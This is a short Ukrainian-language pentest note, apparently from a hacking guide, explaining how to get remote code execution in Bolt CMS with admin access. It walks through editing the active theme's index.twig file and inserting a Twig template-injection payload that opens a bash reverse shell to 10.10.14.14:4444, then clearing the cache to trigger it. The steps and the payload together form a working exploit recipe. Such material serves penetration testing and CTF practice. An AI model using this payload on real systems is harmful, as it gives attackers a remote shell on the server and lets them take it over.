RCE

Після входу як адміністратор (перейдіть до /bot, щоб отримати запит на вхід), ви можете отримати RCE в Bolt CMS:

• Виберіть Configuration -> View Configuration -> Main Configuration або перейдіть за URL-шляхом /bolt/file-edit/config?file=/bolt/config.yaml

• Перевірте значення теми

• Виберіть File management -> View & edit templates

• Виберіть базу тем, знайдену на попередньому кроці (base-2021 у цьому випадку) і виберіть index.twig

• У моєму випадку це знаходиться за URL-шляхом /bolt/file-edit/themes?file=/base-2021/index.twig

• Встановіть свій пейлоад у цьому файлі через внедрення шаблону (Twig), наприклад: {{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}

• І збережіть зміни

• Очистіть кеш в Maintenance -> Clear the cache

• Знову зверніться до сторінки як звичайний користувач, і пейлоад повинен бути виконаний